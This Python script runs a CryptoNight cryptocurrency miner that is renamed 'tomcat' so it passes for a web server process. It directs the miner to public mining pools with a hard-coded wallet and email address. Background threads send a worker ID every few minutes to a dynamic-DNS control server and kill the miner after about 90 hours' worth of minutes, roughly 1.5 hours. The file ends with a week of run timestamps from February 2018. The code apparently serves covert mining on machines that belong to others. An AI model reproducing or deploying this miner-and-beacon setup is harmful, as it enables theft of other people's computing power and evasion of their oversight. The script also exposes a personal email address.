import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:08.326711
#2018-02-17 15:57:04.029715
#2018-02-17 17:44:04.184244
#2018-02-17 19:31:07.281241
#2018-02-17 21:20:06.146948
#2018-02-17 23:04:06.683557
#2018-02-18 00:51:07.296336
#2018-02-18 02:39:05.390852
#2018-02-18 04:27:03.380431
#2018-02-18 06:18:02.072744
#2018-02-18 08:07:06.131014
#2018-02-18 09:54:06.863669
#2018-02-18 11:42:01.351462
#2018-02-18 13:27:07.316142
#2018-02-18 15:17:05.778102
#2018-02-18 17:06:07.408641
#2018-02-18 18:53:05.308847
#2018-02-18 20:41:01.326847
#2018-02-18 22:26:04.621119
#2018-02-19 00:15:08.479194
#2018-02-19 02:01:07.691046
#2018-02-19 03:49:02.214015
#2018-02-19 05:34:01.972982
#2018-02-19 07:22:05.430170
#2018-02-19 09:13:02.150829
#2018-02-19 11:02:06.054582
#2018-02-19 12:48:09.682410
#2018-02-19 14:37:05.951042
#2018-02-19 16:26:01.683701
#2018-02-19 18:12:06.054356
#2018-02-19 19:59:01.679548
#2018-02-19 21:47:07.846115
#2018-02-19 23:33:05.435233
#2018-02-20 01:20:03.698899
#2018-02-20 03:10:09.769235
#2018-02-20 04:58:06.749663
#2018-02-20 06:42:07.224510
#2018-02-20 08:27:07.646547
#2018-02-20 10:12:07.388691
#2018-02-20 11:56:05.035899
#2018-02-20 13:45:04.016460
#2018-02-20 15:33:04.883980
#2018-02-20 17:18:10.777884
#2018-02-20 19:07:09.090286
#2018-02-20 20:57:01.272780
#2018-02-20 22:41:05.474294
#2018-02-21 00:23:05.290747
#2018-02-21 02:08:08.084599
#2018-02-21 03:54:07.366196
#2018-02-21 05:42:05.092056
#2018-02-21 07:30:10.723665
#2018-02-21 09:14:06.224185
#2018-02-21 11:03:07.615492
#2018-02-21 12:51:01.595252
#2018-02-21 14:38:07.671544
#2018-02-21 16:24:11.167066
#2018-02-21 18:14:09.384245
#2018-02-21 20:00:11.809479
#2018-02-21 21:48:08.811365
#2018-02-21 23:36:07.179955
#2018-02-22 01:25:09.898481
#2018-02-22 03:13:07.700109
#2018-02-22 04:58:07.274112
#2018-02-22 06:43:03.949559
#2018-02-22 08:32:06.212560
#2018-02-22 10:18:07.345528
#2018-02-22 12:03:09.279054
#2018-02-22 13:48:11.616363
#2018-02-22 15:37:04.604829
#2018-02-22 17:22:08.968155
#2018-02-22 19:11:04.972185
#2018-02-22 21:03:05.544479
#2018-02-22 22:47:06.930853
#2018-02-23 00:36:06.862340
#2018-02-23 02:21:01.878924
#2018-02-23 04:09:07.339911
#2018-02-23 05:54:07.469821
#2018-02-23 07:43:08.554488
#2018-02-23 09:48:01.271589
#2018-02-23 11:53:04.238273
#2018-02-23 13:43:07.423993
#2018-02-23 15:31:07.618618
#2018-02-23 17:20:04.234010
#2018-02-23 19:04:04.734688
#2018-02-23 20:49:04.278432
#2018-02-23 22:31:05.182096
#2018-02-24 00:17:01.436453
#2018-02-24 02:07:04.498024
#2018-02-24 03:57:01.761833
#2018-02-24 05:42:03.765280
#2018-02-24 07:33:03.866718
#2018-02-24 09:19:06.275405
#2018-02-24 11:07:02.219499
#2018-02-24 12:55:08.162290
#2018-02-24 14:44:06.457543
#2018-02-24 16:34:06.125391
#2018-02-24 18:24:05.299837
#2018-02-24 20:10:07.205663
#2018-02-24 21:54:06.251144
#2018-02-25 01:51:06.642703
#2018-02-25 04:55:06.509707
#2018-02-25 09:19:02.137395